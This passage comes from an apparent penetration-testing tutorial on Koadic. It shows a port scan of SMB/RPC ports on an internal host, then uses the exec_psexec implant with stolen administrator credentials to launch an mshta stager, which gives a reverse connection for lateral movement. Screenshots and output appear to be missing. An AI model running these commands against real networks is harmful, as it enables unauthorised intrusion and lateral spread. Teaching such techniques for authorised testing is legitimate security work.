We now have access to the system and using the credentials of this system, we can move around in the network and try to access another system that is in the same network. However, for this to work, we need to know the services running on the system. For this, we can use the tcp scanner implant for port scanning, which can be done by running the following commands:
use implant/scan/tcp info set rports 135,139,445 set rhosts set zombie 0
The implant is ready to roll! Now we just need to run it:
The mentioned ports are open, which means we can access the Remote Procedure Call (RPC) server on port 445 of this system. The main idea here is to access the RPC server to execute remote commands to execute our given stager command, which will get us the reverse connection over MSHTA. For this, we can use the exec_psexec implant and set the cmd to
mshta, which will execute our stager command on the given internal system:
use implant/pivot/exec_psexec info set cmd "mshta"
We also need to give the credentials for it:
set smbuser administrator set smbpass 123456 set zombie 1
The implant is ready to run, so let's run it:
As you can see from the preceding output, when we run the implant, it executed our given CMD to get hooked up by our stager.
Checking on all the zombies, we can see clearly that we now have access to as well:
Using Koadic can be chaotic, depending upon the imagination of the user.